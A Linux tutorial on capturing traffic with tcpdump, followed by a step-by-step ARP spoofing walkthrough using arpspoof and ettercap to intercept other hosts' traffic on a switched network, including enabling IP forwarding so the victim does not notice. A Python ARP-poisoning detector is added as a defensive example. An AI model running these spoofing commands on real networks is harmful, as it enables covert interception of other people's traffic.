Capture and read network traffic in Linux:
$ ip address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:2c:c1:16 brd ff:ff:ff:ff:ff:ff
    inet 192.168.111.201/24 brd 192.168.111.255 scope global dynamic ens33
       valid_lft 1691sec preferred_lft 1691sec
    inet6 fe80::20c:29ff:fe2c:c116/64 scope link
       valid_lft forever preferred_lft forever
Install tcpdump for your operating distribution.
$ sudo apt update && sudo apt install --assume-yes tcpdump # Ubuntu and Debian
Run tcpdump against the network interface that you've selected.
$ sudo tcpdump --interface=ens33
$ sudo tcpdump --interface=ens33 host 192.168.111.2
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
05:33:00.600161 IP host > _gateway: ICMP echo request, id 1625, seq 1, length 64
05:33:00.600286 IP _gateway > host: ICMP echo reply, id 1625, seq 1, length 64
05:33:00.602106 IP host.41923 > _gateway.domain: 57259+ PTR? 18.104.22.168.in-addr.arpa. (44)
05:33:00.616784 IP _gateway.domain > host.41923: 57259 NXDomain*- 0/0/0 (44)
$ sudo tcpdump --interface=ens33 host 192.168.111.2 -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
05:35:13.914066 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 3, length 64
05:35:13.914414 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 3, length 64
05:35:14.937278 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 4, length 64
05:35:14.937723 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 4, length 64
$ sudo tcpdump --interface=ens33 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
05:40:12.229010 IP host.53904 > _gateway.http: Flags [S], seq 908428722, win 64240, options [mss 1460,sackOK,TS val 3777051478 ecr 0,nop,wscale 7], length 0
05:40:12.229182 IP _gateway.http > host.53904: Flags [R.], seq 0, ack 908428723, win 32767, length 0
A network switch doesn't forward packets to everyone in the network the way a network hub does, so in theory one person in the network cannot look at another person's traffic. There are ways to get around this, however, one of which is arp spoofing.
This guide will just discuss how it is done without discussing the theory behind the process. To start, install the necessary program, which in this case is the dsniff package containing the arpspoof program that we need. In Ubuntu or any other Debian based distribution, it's installable with the apt command as follows:
$ sudo apt install --assume-yes dsniff
To make sure the traffic is forwarded to the real destination as it reaches our machine, the following command needs to be run:
$ echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward # "sudo echo 1 > /proc/sys/..." fails: the redirection is done by the unprivileged shell, not by sudo
This makes sure the target machine's connection is not interrupted, and nobody should realize what we're doing.
The following command will tell the gateway "I am 192.168.0.100", and the next command tells 192.168.0.100 "I am the gateway":
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1
$ sudo arpspoof 192.168.0.1 -t 192.168.0.100
With this, all the traffic that's supposed to go from the machine to the gateway, and the other way around, will pass through our machine first and only then be forwarded to the real target. With this we can run any packet analysis tool such as tcpdump or wireshark.
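As an added defensive example (not part of the original guide), the following Python script looks for the two traces the arpspoof commands above leave in a capture: an IP address whose advertised MAC address changes, and a single MAC address claiming more than one IP address. It parses the ARP reply lines printed by tcpdump -n arp; the sample capture and all MAC addresses in it are constructed placeholders.

```python
import re
from collections import defaultdict

# Matches the reply lines printed by "tcpdump -n arp", e.g.
#   05:41:02.000350 ARP, Reply 192.168.0.1 is-at 52:54:00:11:22:33, length 28
ARP_REPLY = re.compile(r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-fA-F:]{17})")

# Constructed sample capture (not from a real network): the gateway and a
# client answer normally, then a third MAC (placeholder de:ad:be:ef:00:01)
# claims both addresses, which is exactly what the two arpspoof commands do.
SAMPLE_CAPTURE = """\
05:41:02.000100 ARP, Request who-has 192.168.0.1 tell 192.168.0.100, length 28
05:41:02.000350 ARP, Reply 192.168.0.1 is-at 52:54:00:11:22:33, length 28
05:41:02.500200 ARP, Reply 192.168.0.100 is-at 08:00:27:aa:bb:cc, length 28
05:41:03.100200 ARP, Reply 192.168.0.100 is-at de:ad:be:ef:00:01, length 28
05:41:03.100400 ARP, Reply 192.168.0.1 is-at de:ad:be:ef:00:01, length 28
"""


def detect_arp_conflicts(lines):
    """Scan tcpdump ARP output for two symptoms of ARP poisoning.

    Returns (ip_changes, shared_macs):
      ip_changes  - list of (ip, old_mac, new_mac), one entry each time the
                    MAC advertised for an IP address changes
      shared_macs - dict mac -> sorted IPs, for MACs that claimed >1 IP
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    ip_changes = []
    for line in lines:
        match = ARP_REPLY.search(line)
        if not match:
            continue  # requests and non-ARP lines carry no IP-to-MAC binding
        ip, mac = match.group(1), match.group(2).lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            ip_changes.append((ip, previous, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    shared_macs = {mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1}
    return ip_changes, shared_macs


if __name__ == "__main__":
    changes, shared = detect_arp_conflicts(SAMPLE_CAPTURE.splitlines())
    for ip, old, new in changes:
        print(f"ALERT: {ip} moved from {old} to {new}")
    for mac, ips in shared.items():
        print(f"ALERT: {mac} claims {', '.join(ips)}")
```

To check live traffic, feed the lines of sudo tcpdump -l -n arp to detect_arp_conflicts instead of the constructed sample.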
There are programs, however, that make the whole process simpler. One of the favored programs for this is ettercap. Ettercap can perform arp spoofing as well, among its many other features. In Ubuntu, the package is called ettercap-gtk:
$ sudo apt install --assume-yes ettercap-gtk
Running the program with the -G switch will run it in GTK rather than in ncurses.
$ sudo ettercap -G
At the menu, choose the following:
Sniff -> Unified sniffing
And at the prompt, choose the network interface to be used. Normally it would be eth0.
Network Interface: eth0
At the menu again, choose the following to add all hosts in the network to the list:
Hosts -> Scan for hosts
And the following will do the arp spoofing for everyone in the network:
Mitm -> Arp poisoning -> Ok
Start -> Start sniffing
The following command does the same thing as the above example in one single command:
$ sudo ettercap -q -T -M arp // //